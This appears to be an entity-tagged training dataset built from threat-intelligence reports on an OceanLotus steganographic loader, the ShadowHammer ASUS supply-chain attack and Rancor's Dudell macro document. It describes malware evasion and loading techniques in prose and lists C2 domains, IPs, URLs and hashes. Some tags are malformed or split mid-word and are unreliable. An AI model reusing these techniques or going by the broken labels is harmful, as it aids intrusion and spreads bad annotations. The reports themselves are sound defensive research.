pixel O
colors O
from O
a O
.png O
image O
. O

After O
decoding O
the O
.png O
image O
, O
the O
loader O
then O
proceeds O
to O
initialize O
the O
key O
and O
IV O
used O
to O
perform O
AES O
decryption O
of O
the O
encrypted O
payload O
. O

Both O
values O
are O
supplied O
from O
an O
array O
of O
256 O
pseudo-random O
bytes O
hardcoded O
in O
the O
binary’s O
.rdata O
section O
. O

The O
first O
two O
bytes O
of O
that O
array O
specify O
the O
relative O
offsets O
to O
the O
key O
and O
IV O
respectively O
. O

The O
loader O
uses O
the O
AES128 S-ENCR
implementation O
from O
the O
open-source O
Crypto++2 B-TOOL
library E-TOOL
. O

We O
were O
able O
to O
correlate O
most O
of O
the O
disassembly O
to O
the O
corresponding O
functions O
from O
the O
Crypto++ S-TOOL
github O
source O
, O
and O
it O
doesn’t O
appear O
that O
the O
malware O
authors O
have O
modified O
much O
of O
the O
original O
code O
. O

A O
SimpleKeyringInterface S-TOOL
class O
is O
used O
to O
initialize O
the O
key O
, O
while O
the O
IV O
is O
passed O
to O
the O
SetCipherWithIV S-TOOL
function O
. O

The O
decryption O
is O
performed O
with O
the O
use O
of O
the O
StreamTransformationFilter S-TOOL
class O
with O
the O
StreamTransformation S-TOOL
cipher O
set O
to O
AES O
CBC O
decryption O
mode O
. O

The O
library O
code O
performs O
numerous O
checks O
for O
the O
CPU O
features O
, O
and O
based O
on O
the O
outcome O
, O
it O
will O
choose O
a O
processor-specific O
implementation O
of O
the O
cryptographic O
function O
. O

One O
of O
the O
AES O
implementations O
makes O
use O
of O
the O
Intel S-IDTY
AES-NI S-TOOL
encryption O
instruction O
set O
which O
is O
supported O
by O
several O
modern O
Intel S-IDTY
and O
AMD S-IDTY
CPUs O
. O

The O
decrypted O
payload O
undergoes O
one O
final O
transformation O
, O
where O
it O
is O
XORed O
with O
the O
first O
byte O
read O
from O
the O
C:\Windows\system O
. O
ini O
file O
, O
which O
is O
expected O
to O
begin O
with O
a O
comment O
character O
" O
; O
" O
( O
0x3B O
) O
. O

Performing O
the O
same O
steps O
in O
CyberChef S-TOOL
, O
it O
is O
possible O
to O
decode O
the O
encrypted O
payload O
, O
which O
should O
yield O
x86 O
shellcode O
, O
starting O
with O
a O
call O
immediate O
opcode O
sequence O
. O

Varies S-MAL
: O

4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d S-SHA2
Malware/Backdoor O
658 O
KB O
( O
674 O
, O
304 O
bytes O
) O
PE32 O
executable O
for O
MS O
Windows S-OS
( O
DLL S-TOOL
) O
( O
console O
) O
Intel S-IDTY
80386 O
32-bit O
September B-TIME
2018 E-TIME
. O

While O
this O
loader O
differs O
somewhat O
in O
general O
implementation O
, O
the O
payload O
extraction O
routine O
seems O
to O
be O
the O
same O
as O
in O
the O
previous O
variant O
. O

The O
main O
differences O
are O
: O

The O
way O
the O
decryption O
routine O
is O
called O
( O
from O
within O
the O
DllMain S-TOOL
function O
, O
as O
opposed O
to O
an O
exported O
function O
) O
. O

The O
way O
the O
payload O
is O
invoked O
( O
by O
overwriting O
the O
return O
address O
on O
the O
stack O
, O
as O
opposed O
to O
a O
direct O
call O
) O
. O

Implementation O
of O
an O
additional O
anti-analysis O
check O
that O
compares O
the O
name O
of O
the O
parent O
process O
to O
a O
string O
stored O
in O
an O
encrypted O
resource O
. O

We O
came O
across O
multiple O
variations O
of O
this O
DLL S-TOOL
containing O
different O
parent O
process O
names O
, O
possibly O
targeted O
specifically O
to O
the O
victim’s O
environment O
. O

Some O
of O
these O
names O
include O
processes O
related O
to O
security O
software O
: O

wsc_proxy.exe S-FILE
plugins-setup.exe S-FILE
SoftManager.exe S-FILE
GetEFA.exe S-FILE
. O

Features O
: O

Side-loaded O
DLL S-TOOL
Anti-debugging/anti-sandboxing O
check O
for O
parent O
process O
name O
. O

Loads O
next-stage O
payload O
using O
custom B-TOOL
.png I-TOOL
steganography E-TOOL
. O

Uses O
AES128 S-ENCR
implementation O
from O
Crypto++ B-TOOL
library E-TOOL
for O
payload O
decryption O
. O

Executes O
the O
payload O
by O
overwriting O
the O
return O
address O
on O
the O
stack O
. O

Known O
to O
load O
an O
updated O
version O
of O
Remy B-MAL
backdoor E-MAL
. O

This O
DLL S-TOOL
does O
not O
contain O
an O
export O
table O
and O
its O
entire O
functionality O
resides O
in O
the O
DllMain S-TOOL
routine O
. O

Upon O
execution O
, O
the O
malware O
will O
first O
decrypt O
a O
string O
from O
its O
resources O
and O
compare O
it O
against O
the O
name O
of O
the O
parent O
process O
. O

If O
the O
names O
differ O
, O
the O
malware O
will O
simply O
exit O
without O
touching O
the O
payload O
. O

The O
resource O
containing O
the O
expected O
process O
name O
( O
ICON/1 O
) O
is O
XORed O
with O
the O
first O
byte O
of O
the O
legitimate O
C:\Windows\system.ini S-FILE
file O
– O
0x3B O
( O
" O
; O
" O
) O
. O

If O
the O
parent O
name O
matches O
, O
the O
malware O
will O
traverse O
the O
stack O
in O
order O
to O
find O
a O
return O
address O
that O
falls O
into O
the O
memory O
of O
the O
parent O
process’s O
text O
section O
. O

Next O
, O
the O
payload O
is O
read O
from O
the O
.png O
cover O
file O
, O
which O
seems O
to O
have O
been O
taken O
from O
an O
inspirational O
quotes O
website3 O
. O

In O
this O
instance O
, O
the O
payload O
is O
fully O
contained O
within O
the O
image’s O
pixel O
color O
codes O
, O
leaving O
no O
remaining O
data O
beyond O
the O
IEND O
marker O
. O

Finally O
, O
the O
loader O
will O
decrypt O
the O
payload O
to O
a O
memory O
buffer O
and O
overwrite O
the O
previously O
found O
return O
address O
with O
the O
pointer O
to O
that O
buffer O
, O
ensuring O
that O
the O
malicious O
shellcode O
will O
be O
executed O
when O
the O
DLL S-TOOL
attempts O
to O
return O
to O
the O
caller O
. O

The O
loader O
embedded O
in O
the O
payload O
seems O
to O
be O
a O
variant O
of O
the O
Veil S-TOOL
" O
shellcode_inject S-TOOL
" O
payload O
, O
previously O
used O
by O
OceanLotus S-APT
to O
load O
older O
versions O
of O
Remy B-MAL
backdoor E-MAL
. O

In O
this O
instance O
, O
the O
shellcode O
is O
configured O
to O
load O
an O
encoded O
backdoor O
from O
within O
the O
payload O
. O

The O
final O
payload O
comes O
in O
a O
form O
of O
a O
launcher O
DLL S-TOOL
that O
contains O
an O
encrypted O
backdoor O
in O
its O
.rdata O
section O
and O
a O
plain-text O
configuration O
in O
its O
resources O
. O

The O
resources O
also O
store O
one O
or O
more O
C2 S-TOOL
communication O
modules O
. O

The O
backdoor O
DLL S-TOOL
and O
the O
C2 S-TOOL
communication O
DLLs O
are O
heavily O
obfuscated O
using O
high O
quantities O
of O
junk O
code O
, O
which O
significantly O
inflates O
their O
size O
and O
makes O
both O
static O
analysis O
and O
debugging O
more O
difficult O
. O

In O
addition O
to O
Denes S-MAL
and O
Remy B-MAL
backdoors E-MAL
, O
at O
least O
two O
different O
communication O
modules O
were O
observed O
with O
different O
versions O
of O
this O
launcher O
– O
DNSProvider S-TOOL
and O
HTTPProv S-TOOL
. O

The O
launcher O
binary O
, O
which O
contains O
the O
final O
backdoor O
, O
is O
RC4 S-ENCR
encrypted O
and O
wrapped O
in O
a O
layer O
of O
obfuscated O
shellcode O
. O

We O
can O
see O
the O
familiar O
DOS O
stub O
in O
plain O
text O
, O
but O
the O
rest O
of O
the O
header O
and O
binary O
body O
are O
encrypted O
. O

The O
shellcode O
is O
obfuscated O
using O
OceanLotus S-APT
’s O
standard O
approach O
of O
flattening O
the O
control O
flow O
and O
inserting O
junk O
opcodes O
( O
as O
described O
in O
the O
ESET S-SECTEAM
white O
paper O
on O
OceanLotus S-APT
) O
. O

The O
shellcode O
starts O
in O
a O
fairly O
standard O
way O
– O
by O
walking O
the O
list O
of O
loaded O
modules O
in O
order O
to O
find O
the O
base O
of O
kernel32.dll S-FILE
library O
. O

Once O
kernel32 S-TOOL
base O
is O
found O
, O
the O
shellcode O
will O
calculate O
the O
addresses O
of O
LoadLibraryA S-TOOL
and O
GetProcAddress S-TOOL
functions O
, O
and O
use O
them O
to O
resolve O
other O
necessary O
APIs S-TOOL
, O
which O
include O
VirtualAlloc S-TOOL
, O
RtlMoveMemory S-TOOL
, O
and O
RtlZeroMemory S-TOOL
. O

After O
resolving O
the O
APIs S-TOOL
, O
the O
shellcode O
will O
decrypt O
the O
launcher O
binary O
and O
load O
it O
to O
the O
memory O
. O

MZ O
header O
, O
PE O
header O
, O
as O
well O
as O
each O
section O
and O
their O
header O
, O
are O
decrypted O
separately O
using O
RC4 S-TOOL
algorithm O
and O
a O
hardcoded O
key O
. O

Once O
all O
sections O
are O
loaded O
, O
the O
relocations O
get O
fixed O
and O
the O
MZ/PE O
headers O
are O
zeroed O
out O
in O
memory O
. O

The O
shellcode O
then O
proceeds O
to O
execute O
the O
payload O
DLL’s O
entry O
point O
. O

The O
Internal O
name O
of O
this O
DLL S-TOOL
is O
a O
randomly O
looking O
CLSID S-TOOL
and O
it O
only O
exports O
one O
function O
called O
DllEntry S-TOOL
. O

Upon O
execution O
, O
the O
launcher O
will O
attempt O
to O
hook O
legitimate O
wininet.dll S-FILE
library O
by O
overwriting O
its O
entry O
point O
in O
memory O
with O
the O
address O
of O
a O
malicious O
routine O
. O

If O
successful O
, O
every O
time O
the O
system O
loads O
wininet.dll S-FILE
, O
the O
entry O
point O
of O
the O
subsequently O
dropped O
backdoor O
DLL S-TOOL
will O
be O
executed O
before O
the O
original O
wininet O
entry O
point O
. O

There O
is O
no O
proper O
DLL S-TOOL
injection O
routine O
– O
the O
payload O
is O
just O
decompressed O
to O
the O
memory O
as-is O
– O
so O
the O
malware O
needs O
to O
fix O
all O
the O
pointers O
in O
the O
decompressed O
code O
, O
which O
is O
done O
on O
a O
one-by-one O
basis O
using O
hardcoded O
values O
and O
offsets O
. O

This O
part O
takes O
90% O
of O
the O
whole O
launcher O
code O
and O
includes O
over O
11 O
, O
000 O
modifications O
. O

The O
launcher O
then O
calls O
the O
backdoor O
DLL’s O
entry O
point O
. O

The O
routine O
that O
reads O
configuration O
from O
resources O
and O
decompresses O
the O
C2 S-TOOL
communication O
library O
is O
then O
called O
by O
temporarily O
replacing O
the O
pointer O
to O
CComCriticalSection S-TOOL
function O
with O
the O
pointer O
to O
that O
routine O
. O

Such O
an O
obfuscation O
method O
makes O
it O
difficult O
to O
spot O
it O
in O
the O
code O
. O

The O
launcher O
loads O
configuration O
from O
resources O
and O
uses O
an O
export O
from O
the O
backdoor O
DLL S-TOOL
to O
initialize O
config O
values O
in O
memory O
. O

Resource O
P1/1 O
contains O
config O
values O
, O
including O
port O
number O
and O
a O
registry O
path O
. O

After O
the O
content O
of O
resource O
0xC8 O
is O
decompressed O
, O
another O
function O
from O
the O
backdoor O
DLL S-TOOL
is O
used O
to O
load O
the O
C2 S-TOOL
communication O
module O
to O
the O
memory O
and O
call O
its O
" O
CreateInstance S-TOOL
" O
export O
. O

Finally O
, O
the O
launcher O
passes O
control O
to O
the O
main O
backdoor O
routine O
. O

OceanLotus S-APT
: O
0 O
4 O
name O
is O
read O
from O
resource O
P1/0x64 O
. O

OceanLotus S-APT
: O
{12C044FA-A4AB-433B-88A2-32C3451476CE} O
memory O
pointer O
4 O
points O
to O
a O
function O
that O
spawns O
another O
copy O
of O
malicious O
process O
. O

OceanLotus S-APT
: O
{9E3BD021-B5AD-49DEAE93-F178329EE0FE} O
C&C O
URLs O
varies O
content O
is O
read O
from O
resource O
P1/2 O
. O

OceanLotus S-APT
: O
0 O
config O
varies O
content O
is O
read O
from O
resource O
P1/1 O
. O

OceanLotus S-APT
: O
{B578B063-93FB-4A5F-82B4-4E6C5EBD393B} O
? O
4 O
0 O
( O
config+0x486 O
) O
. O

OceanLotus S-APT
: O
{5035383A-F7B0-424A-9C9A-CA667416BA6F} O
port O
number O
4 O
0x1BB O
( O
443 O
) O
( O
config+0x46C O
) O
. O

OceanLotus S-APT
: O
{68DDB1F1-E31F-42A9-A35D-984B99ECBAAD} O
registry O
path O
varies O
SOFTWARE\Classes\CLSID\{57C3E2E2-C18F-4ABF-BAAA-9D17879AB029} O
. O

The O
backdoor O
DLL S-TOOL
is O
stored O
in O
the O
.rdata O
section O
of O
the O
launcher O
, O
compressed O
with O
LZMA S-TOOL
, O
and O
encrypted O
with O
RC4 S-TOOL
. O

The O
binary O
is O
heavily O
obfuscated O
with O
overlapping O
blocks O
of O
garbage O
code O
enclosed O
in O
pushf/popf O
instructions O
. O

The O
DllMain S-TOOL
function O
replaces O
the O
pointer O
to O
GetModuleHandleA B-TOOL
API E-TOOL
with O
a O
pointer O
to O
hook O
routine O
that O
will O
return O
the O
base O
of O
the O
backdoor O
DLL S-TOOL
when O
called O
with O
NULL O
as O
parameter O
( O
instead O
of O
returing O
the O
handle O
to O
the O
launcher O
DLL S-TOOL
) O
. O

The O
backdoor O
also O
contains O
an O
export O
that O
loads O
the O
C2 S-TOOL
communication O
module O
reflectively O
to O
the O
memory O
from O
resource O
passed O
as O
parameter O
and O
then O
calls O
its O
" O
CreateInstance S-TOOL
" O
export O
. O

While O
we O
are O
still O
in O
the O
process O
of O
analyzing O
this O
backdoor’s O
full O
functionality O
, O
it O
seems O
to O
be O
similar O
to O
the O
Remy B-MAL
backdoor E-MAL
described O
in O
our O
previous O
whitepaper O
on O
OceanLotus S-APT
malware O
. O

This O
DLL S-TOOL
is O
stored O
in O
the O
launcher’s O
resources O
and O
compressed O
with O
LZMA S-TOOL
. O

It’s O
also O
heavily O
obfuscated O
, O
but O
in O
a O
slightly O
different O
way O
than O
the O
backdoor O
. O

Although O
it O
doesn’t O
contain O
an O
internal O
name O
, O
we O
believe O
it’s O
a O
variant O
of O
HttpProv B-TOOL
library E-TOOL
, O
as O
described O
in O
the O
ESET S-SECTEAM
white O
paper O
on O
OceanLotus S-APT
. O

This O
module O
is O
used O
by O
the O
backdoor O
during O
HTTP/HTTPS O
communication O
with O
the O
C2 S-TOOL
server O
and O
has O
a O
proxy O
bypass O
functionality O
. O

OceanLotus S-APT
: O
ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4 S-SHA2
Loader O
#1 O
. O

OceanLotus S-APT
: O
0ee693e714be91fd947954daee85d2cd8d3602e9d8a840d520a2b17f7c80d999 S-SHA2
Loader O
#1 O
. O

OceanLotus S-APT
: O
a2719f203c3e8dcdcc714dd3c1b60a4cbb5f7d7296dbb88b2a756d85bf0e9c1e S-SHA2
Loader O
#1 O
. O

OceanLotus S-APT
: O
4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d S-SHA2
Loader O
#2 O
. O

OceanLotus S-APT
: O
e0fc83e57fbbb81cbd07444a61e56e0400f7c54f80242289779853e38beb341e S-SHA2
Loader O
#2 O
. O

OceanLotus S-APT
: O
cd67415dd634fd202fa1f05aa26233c74dc85332f70e11469e02b370f3943b1d S-SHA2
Loader O
#2 O
. O

OceanLotus S-APT
: O
9112f23e15fdcf14a58afa424d527f124a4170f57bd7411c82a8cdc716f6e934 S-SHA2
Loader O
#2 O
. O

OceanLotus S-APT
: O
ecaeb1b321472f89b6b3c5fb87ec3df3d43a10894d18b575d98287b81363626f S-SHA2
Loader O
#2 O
. O

OceanLotus S-APT
: O
478cc5faadd99051a5ab48012c494a807c7782132ba4f33b9ad9229a696f6382 S-SHA2
Loader O
#2 O
. O

OceanLotus S-APT
: O
72441fe221c6a25b3792d18f491c68254e965b0401a845829a292a1d70b2e49a S-SHA2
Payload O
PNG O
( O
loader O
#1 O
) O
. O

OceanLotus S-APT
: O
11b4c284b3c8b12e83da0b85f59a589e8e46894fa749b847873ed6bab2029c0f S-SHA2
Payload O
PNG O
( O
loader O
#2 O
) O
. O

OceanLotus S-APT
: O
d78a83e9bf4511c33eaab9a33ebf7ccc16e104301a7567dd77ac3294474efced S-SHA2
Payload O
PNG O
( O
loader O
#2 O
) O
. O

OceanLotus S-APT
: O
E:\ProjectGit\SHELL\BrokenSheild\BrokenShieldPrj\Bin\x86\Release\DllExportx86.pdb S-FILE
Loader O
#1 O
. O

OceanLotus S-APT
: O
C:\Users\Meister\Documents\Projects\BrokenShield\Bin\x86\Release\BrokenShield.pdb S-FILE
Loader O
#2 O
. O

OceanLotus S-APT
: O
kermacrescen.com S-DOM
7244 O
. O

OceanLotus S-APT
: O
stellefaff.com S-DOM
7244 O
. O

OceanLotus S-APT
: O
manongrover.com S-DOM
7244 O
. O

OceanLotus S-APT
: O
background.ristians.com:8888 S-DOM
11b4 O
. O

OceanLotus S-APT
: O
enum.arkoorr.com:8531 S-DOM
11b4 O
. O

OceanLotus S-APT
: O
worker.baraeme.com:8888 S-DOM
11b4 O
. O

OceanLotus S-APT
: O
enum.arkoorr.com:8888 S-DOM
11b4 O
. O

OceanLotus S-APT
: O
worker.baraeme.com:8531 S-DOM
11b4 O
. O

OceanLotus S-APT
: O
plan.evillese.com:8531 S-DOM
11b4 O
. O

OceanLotus S-APT
: O
background.ristians.com:8531 S-DOM
11b4 O
. O

OceanLotus S-APT
: O
plan.evillese.com:8888 S-DOM
11b4 O
. O

OceanLotus S-APT
: O
SOFTWARE\Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B} O
7244 O
. O

OceanLotus S-APT
: O
SOFTWARE\App\AppX06c7130ad61f4f60b50394b8cba3d35f\Applicationz S-TOOL
7244 O
. O

OceanLotus S-APT
: O
SOFTWARE\Classes\CLSID\{57C3E2E2-C18F-4ABF-BAAA-9D17879AB029} O
11b4 O
. O


Operation O
ShadowHammer S-ACT
. O

Earlier O
today O
, O
Motherboard S-IDTY
published O
a O
story O
by O
Kim O
Zetter O
on O
Operation O
ShadowHammer S-ACT
, O
a O
newly O
discovered O
supply B-ACT
chain I-ACT
attack E-ACT
that O
leveraged O
ASUS B-TOOL
Live I-TOOL
Update E-TOOL
software O
. O

While O
the O
investigation O
is O
still O
in O
progress O
and O
full O
results O
and O
technical O
paper O
will O
be O
published O
during O
SAS O
2019 S-TIME
conference O
in O
Singapore S-LOC
, O
we O
would O
like O
to O
share O
some O
important O
details O
about O
the O
attack O
. O

In O
January B-TIME
2019 E-TIME
, O
we O
discovered O
a O
sophisticated O
supply B-ACT
chain I-ACT
attack E-ACT
involving O
the O
ASUS B-TOOL
Live I-TOOL
Update I-TOOL
Utility E-TOOL
. O

The O
attack O
took O
place O
between O
June S-TIME
and O
November B-TIME
2018 E-TIME
and O
according O
to O
our O
telemetry O
, O
it O
affected O
a O
large O
number O
of O
users O
. O

ASUS B-TOOL
Live I-TOOL
Update E-TOOL
is O
an O
utility O
that O
is O
pre-installed O
on O
most O
ASUS S-IDTY
computers O
and O
is O
used O
to O
automatically O
update O
certain O
components O
such O
as O
BIOS S-TOOL
, O
UEFI S-TOOL
, O
drivers S-TOOL
and O
applications S-TOOL
. O

According O
to O
Gartner S-IDTY
, O
ASUS S-IDTY
is O
the O
world’s O
5th-largest O
PC O
vendor O
by O
2017 S-TIME
unit O
sales O
. O

This O
makes O
it O
an O
extremely O
attractive O
target O
for O
APT O
groups O
that O
might O
want O
to O
take O
advantage O
of O
their O
userbase O
. O

Based O
on O
our O
statistics O
, O
over O
57 O
, O
000 O
Kaspersky S-SECTEAM
users O
have O
downloaded O
and O
installed O
the O
backdoored O
version O
of O
ASUS B-TOOL
Live I-TOOL
Update E-TOOL
at O
some O
point O
in O
time O
. O

We O
are O
not O
able O
to O
calculate O
the O
total O
count O
of O
affected O
users O
based O
only O
on O
our O
data O
; O
however O
, O
we O
estimate O
that O
the O
real O
scale O
of O
the O
problem O
is O
much O
bigger O
and O
is O
possibly O
affecting O
over O
a O
million O
users O
worldwide O
. O

The O
goal O
of O
the O
attack O
was O
to O
surgically O
target O
an O
unknown O
pool O
of O
users O
, O
which O
were O
identified O
by O
their O
network O
adapters’ O
MAC O
addresses O
. O

To O
achieve O
this O
, O
the O
attackers O
had O
hardcoded O
a O
list O
of O
MAC O
addresses O
in O
the O
trojanized O
samples O
and O
this O
list O
was O
used O
to O
identify O
the O
actual O
intended O
targets O
of O
this O
massive O
operation O
. O

We O
were O
able O
to O
extract O
more O
than O
600 O
unique O
MAC O
addresses O
from O
over O
200 O
samples O
used O
in O
this O
attack O
. O

Of O
course O
, O
there O
might O
be O
other O
samples O
out O
there O
with O
different O
MAC O
addresses O
in O
their O
list O
. O

We O
believe O
this O
to O
be O
a O
very O
sophisticated O
supply B-ACT
chain I-ACT
attack E-ACT
, O
which O
matches O
or O
even O
surpasses O
the O
Shadowpad S-ACT
and O
the O
CCleaner S-ACT
incidents O
in O
complexity O
and O
techniques O
. O

The O
reason O
that O
it O
stayed O
undetected O
for O
so O
long O
is O
partly O
due O
to O
the O
fact O
that O
the O
trojanized O
updaters O
were O
signed O
with O
legitimate O
certificates O
( O
eg O
: O
“ O
ASUSTeK O
Computer O
Inc. O
” O
) O
. O

The O
malicious O
updaters O
were O
hosted O
on O
the O
official O
liveupdate01s.asus.com S-URL
and O
liveupdate01.asus.com S-URL
ASUS S-IDTY
update O
servers O
. O

We O
have O
contacted O
ASUS S-IDTY
and O
informed O
them O
about O
the O
attack O
on O
Jan B-TIME
31 I-TIME
, I-TIME
2019 E-TIME
, O
supporting O
their O
investigation O
with O
IOCs O
and O
descriptions O
of O
the O
malware O
. O

Although O
precise O
attribution O
is O
not O
available O
at O
the O
moment O
, O
certain O
evidence O
we O
have O
collected O
allows O
us O
to O
link O
this O
attack O
to O
the O
ShadowPad S-ACT
incident O
from O
2017 S-TIME
. O

The O
actor O
behind O
the O
ShadowPad S-ACT
incident O
has O
been O
publicly O
identified O
by O
Microsoft S-IDTY
in O
court O
documents O
as O
BARIUM S-APT
. O

BARIUM S-APT
is O
an O
APT O
actor O
known O
to O
be O
using O
the O
Winnti B-MAL
backdoor E-MAL
. O

Recently O
, O
our O
colleagues O
from O
ESET S-SECTEAM
wrote O
about O
another O
supply B-ACT
chain I-ACT
attack E-ACT
in O
which O
BARIUM S-APT
was O
also O
involved O
, O
that O
we O
believe O
is O
connected O
to O
this O
case O
as O
well O
. O

It O
should O
be O
noted O
that O
the O
numbers O
are O
also O
highly O
influenced O
by O
the O
distribution O
of O
Kaspersky S-SECTEAM
users O
around O
the O
world O
. O

In O
principle O
, O
the O
distribution O
of O
victims O
should O
match O
the O
distribution O
of O
ASUS O
users O
around O
the O
world O
. O

We’ve O
also O
created O
a O
tool O
which O
can O
be O
run O
to O
determine O
if O
your O
computer O
has O
been O
one O
of O
the O
surgically O
selected O
targets O
of O
this O
attack O
. O

To O
check O
this O
, O
it O
compares O
MAC O
addresses O
of O
all O
adapters O
to O
a O
list O
of O
predefined O
values O
hardcoded O
in O
the O
malware O
and O
alerts O
if O
a O
match O
was O
found O
. O

Download O
an O
archive O
with O
the O
tool O
( O
.exe S-FILE
) O
. O

Also O
, O
you O
may O
check O
MAC O
addresses O
online O
. O

If O
you O
discover O
that O
you O
have O
been O
targeted O
by O
this O
operation O
, O
please O
e-mail S-TOOL
us O
at O
: O
shadowhammer@kaspersky.com O
. O

Kaspersky B-SECTEAM
Lab E-SECTEAM
verdicts O
for O
the O
malware O
used O
in O
this O
and O
related O
attacks O
. O

ShadowHammer S-APT
: O
HEUR S-MAL
: O
Trojan.Win32.ShadowHammer.gen S-MAL
. O

ShadowHammer S-APT
: O
asushotfix.com S-URL
. O

ShadowHammer S-APT
: O
141.105.71.116 S-IP
. O

ShadowHammer S-APT
: O
http://liveupdate01.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER365.zip S-URL
. O

ShadowHammer S-APT
: O
https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER362.zip S-URL
. O

ShadowHammer S-APT
: O
https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip S-URL
. O

ShadowHammer S-APT
: O
https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER359.zip S-URL
. O

ShadowHammer S-APT
: O
Liveupdate_Test_VER365.zip S-FILE
. O

ShadowHammer S-APT
: O
aa15eb28292321b586c27d8401703494 S-SHA1
. O

Rancor S-APT
: O
Cyber O
Espionage O
Group O
Uses O
New O
Custom O
Malware O
to O
Attack O
Southeast B-LOC
Asia E-LOC
. O

In O
late B-TIME
June I-TIME
2018 E-TIME
, O
Unit B-SECTEAM
42 E-SECTEAM
revealed O
a O
previously O
unknown O
cyber O
espionage O
group O
we O
dubbed O
Rancor S-APT
, O
which O
conducted O
targeted O
attacks O
in O
Southeast B-LOC
Asia E-LOC S-LOC
throughout O
2017 S-TIME
and O
2018 S-TIME
. O

In O
recent O
attacks O
, O
the O
group O
has O
persistently O
targeted O
at O
least O
one O
government B-IDTY
organization I-IDTY
in I-IDTY
Cambodia B-LOC E-IDTY E-LOC
from O
December B-TIME
2018 E-TIME
through O
January B-TIME
2019 E-TIME
. O

While O
researching O
these O
attacks O
, O
we O
discovered O
an O
undocumented O
, O
custom O
malware O
family O
– O
which O
we O
’ve O
named O
Dudell S-MAL
. O

In O
addition O
, O
we O
discovered O
the O
group O
using O
Derusbi S-MAL
, O
which O
is O
a O
malware O
family O
believed O
to O
be O
unique O
to O
a O
small O
subset O
of O
Chinese O
cyber O
espionage O
groups O
. O

Between O
early B-TIME
December I-TIME
2018 E-TIME
and O
the O
end B-TIME
of I-TIME
January I-TIME
2019 E-TIME
, O
Rancor S-APT
conducted O
at O
least O
two O
rounds O
of O
attacks O
intending O
to O
install B-ACT
Derusbi I-ACT
or I-ACT
KHRat I-ACT
malware I-ACT
 S-MALon I-ACT
 S-MALvictim I-ACT
systems E-ACT
. O

January B-TIME
2019 E-TIME
sent O
via O
149.28.156.61 S-IP
to O
deliver O
either O
Derusbi S-MAL
or O
KHRat S-MAL
samples O
with O
either O
cswksfwq.kfesv.xyz S-DOM
or O
connect.bafunpda.xyz S-DOM
as O
C2 S-TOOL
. O

DUDELL S-MAL
: O
SHA256 S-ENCR
: O
0d61d9baab9927bb484f3e60384fdb6a3709ca74bc6175ab16b220a68f2b349e S-SHA2
. O

DUDELL S-MAL
: O
File O
Type O
:M B-TOOL
icrosoft I-TOOL
Excel I-TOOL
97 I-TOOL
– I-TOO B-IDTYL
2 E-IDTY003 I-TOOL
Document E-TOOL
. O

DUDELL S-MAL
: O
File O
Name O
:E B-FILE
quipment I-FILE
Purchase I-FILE
List I-FILE
2018-2020 I-FILE
(Final I-FILE
).xls E-FILE
. O

The O
DUDELL S-MAL
sample O
is O
a O
weaponized O
Microsoft B-TOOL
Excel B-IDTY I-TOOL E-IDTY
document E-TOOL
that O
contains O
a O
malicious B-TOOL
macro E-TOOL S-TOOL
that O
runs O
on O
the O
victim O
’s O
machine O
. O

It O
shares O
the O
same O
malicious O
behavior O
reported O
by O
Checkpoint S-IDTY
in O
Rancor S-APT
: O
The B-MAL
Year I-MAL
of I-MAL
The I-MAL
Phish E-MAL S-ACT
SHA-1 S-ENCR
c829f5f9ff89210c888c1559bb085ec6e65232de S-SHA1
. O

In O
Check B-IDTY
Point E-IDTY
’s O
blog O
, O
the O
sample O
is O
from O
December B-TIME
2018 E-TIME
while O
this O
sample O
is O
from O
April B-TIME
2018 E-TIME
. O

The O
macro S-TOOL
in O
this O
document O
gets O
executed O
when O
the O
user O
views O
the O
document O
and O
clicks O
Enable O
Content O
, O
at O
which O
point O
the O
macro S-TOOL
locates O
and O
executes O
the O
data O
located O
under O
the O
Company O
field O
in O
the O
document O
’s O
properties O
. O

The O
C2 S-TOOL
server O
199.247.6.253 S-IP
is O
known O
to O
be O
used O
by O
the O
Rancor S-APT
group O
. O

The O
script O
is O
downloading O
a O
second O
stage O
payload O
via O
the O
Microsoft S-IDTY
tool O
msiexec S-TOOL
. O

Unfortunately O
at O
the O
time O
of O
discovery O
, O
the O
hosted O
file O
is O
unavailable O
. O

Our O
systems O
were O
able O
to O
record O
the O
hash O
of O
file O
tmp.vbs S-FILE
, O
but O
the O
contents O
of O
the O
file O
are O
no O
longer O
available O
. O

Pivoting O
off O
the O
filename O
and O
directory O
, O
we O
discovered O
a O
similar O
VBS O
script O
used O
by O
the O
Rancor S-APT
actors O
that O
might O
give O
us O
some O
clues O
on O
what O
the O
contents O
of O
tmp.vbs S-FILE
would O
resemble O
. O

File O
office.vbs S-FILE
( O
SHA256 S-ENCR
: O
4b0b319b58c2c0980390e24379a2e2a0a1e1a91d17a9d3e26be6f4a39a7afad2 S-SHA2
) O
was O
discovered O
in O
directory O
c:\Windows\System32\spool\drivers\color O
. O

Hashes O
for O
tmp.vbs S-FILE
:b B-SHA2
958e481c90939962081b9fb85451a2fb28f705d5b5060f5d9d5aebfb390f8 E-SHA2
. O

If O
the O
file O
tmp.vbs S-FILE
does O
in O
fact O
contain O
similar O
content O
as O
that O
of O
office.vbs S-FILE
, O
then O
it O
could O
be O
another O
method O
for O
downloading O
payloads O
onto O
the O
target O
. O

DDKONG S-MAL
Plugin O
: O
SHA256 S-ENCR
: O
0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707 S-SHA2
. O

DDKONG S-MAL
Plugin O
: O
Compile O
Date O
and O
Time O
: O
2017-02-17 B-TIME
08:33:45 I-TIME
AM E-TIME
. O

DDKONG S-MAL
Plugin O
: O
File O
Type O
: O
PE32 O
executable O
( O
DLL S-TOOL
) O
Intel O
80386, O
for O
MS B-OS
Windows E-OS
. O

DDKONG S-MAL
Plugin O
: O
File O
Name O
: O
H B-FILE
istory.nls E-FILE
. O

The O
DllInstall S-MAL
export O
function O
is O
responsible O
for O
the O
core O
behavior O
of O
the O
malware O
, O
as O
just O
loading O
it O
does O
nothing O
. O

Once O
this O
export O
is O
called O
, O
it O
checks O
for O
a O
hidden O
